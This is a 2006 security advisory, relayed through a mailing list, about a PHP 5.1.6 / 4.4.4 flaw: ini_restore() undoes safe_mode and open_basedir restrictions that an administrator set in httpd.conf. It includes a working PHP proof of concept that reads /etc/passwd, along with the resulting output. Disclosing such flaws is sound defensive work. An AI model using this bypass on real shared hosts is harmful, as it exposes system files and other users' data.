[UNIX] PHP 5.1.6 / 4.4.4 Critical php_admin* Bypass by ini_restore()

Subject: [UNIX] PHP 5.1.6 / 4.4.4 Critical php_admin* Bypass by ini_restore()
Date: 10 Sep 2006 14:17:08 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com





SUMMARY

"PHP is an HTML-embedded scripting language. Much of its syntax is 
borrowed from C, Java and Perl with a couple of unique PHP-specific 
features thrown in. The goal of the language is to allow web developers to 
write dynamically generated pages quickly".

There is a privilege escalation vulnerability in PHP.

DETAILS

Vulnerable Systems:
 * PHP 5.1.6 / 4.4.4

Description:
A nice introduction to PHP by Stig Sæther Bakken can be found at 
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of 
the PHP Conference Material is freely available.

php_admin_value  name  value

Sets the value of the specified directive. This can not be used in 
htaccess files. Any directive type set with php_admin_value can not be 
overridden by .htaccess or virtualhost directives. To clear a previously 
set value use none as the value.
php_admin_flag name on|off

Used to set a boolean configuration directive. This can not be used in 
htaccess files. Any directive type set with php_admin_flag
can not be overridden by .htaccess or virtualhost directives.

http://pl.php.net/manual/en/configuration.changes.php

1. php_admin_value and php_admin_flag Bypass
When using PHP as an Apache module, you can also change the configuration 
settings using directives in Apache configuration files (e.g. httpd.conf). 
These directives are used by many ISPs to set open_basedir, safe_mode and 
other options for individual users.

For example:
open_basedir in httpd.conf

<Directory /usr/home/frajer/public_html/>
    Options FollowSymLinks MultiViews Indexes
    AllowOverride None
    php_admin_flag safe_mode 1
    php_admin_value open_basedir /usr/home/frajer/public_html/
</Directory>


PHP keeps two values for every configuration directive: the Local Value 
(in effect for the current script, e.g. as set in httpd.conf) and the 
Master Value (the php.ini or built-in default). Both are shown by 
phpinfo(); ini_get() returns the Local Value.

Example:
If safe_mode or open_basedir (etc.) are set in the Local Value for 
selected users while the Master Value is still the default, you can 
restore the Master Value over the Local Value with the ini_restore() 
function!

ini_restore

(PHP 4, PHP 5)
ini_restore -- Restores the value of a configuration option

Restores a configuration option to the value it has in php.ini. The PHP 
options set in httpd.conf are then bypassed.

Exploit:

<?php
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");       // blocked: open_basedir from httpd.conf is in effect
ini_restore("safe_mode");     // resets the Local Value to the (default) Master Value
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir"); // now empty: the restriction is gone
include("/etc/passwd");       // succeeds
?>

Exploit results:

/usr/home/frajer/public_html/
Warning: include() [function.include]: open_basedir restriction in effect. 
File(/etc/passwd) is not within the allowed path(s):
(/usr/home/frajer/public_html/) in 
/usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include(/etc/passwd) [function.include]: failed to open stream: 
Operation not permitted in
/usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include() [function.include]: Failed opening '/etc/passwd' for 
inclusion (include_path='.:') in
/usr/home/frajer/public_html/ini_restore.php on line 4
# $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # 
root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-ag.....

This issue is very dangerous, because an administrator cannot reliably 
enforce open_basedir or safe_mode for all users.

Patch Availability:
Fixed in CVS HEAD, PHP_5_2, PHP_5_1 and PHP_4_4.
http://cvs.php.net/viewcvs.cgi/php-src/NEWS


ADDITIONAL INFORMATION

The information has been provided by Maksymilian Arciemowicz 
<max@jestsuper.pl>.
The original advisory can be found here: 
http://securityreason.com/achievement_securityalert/42
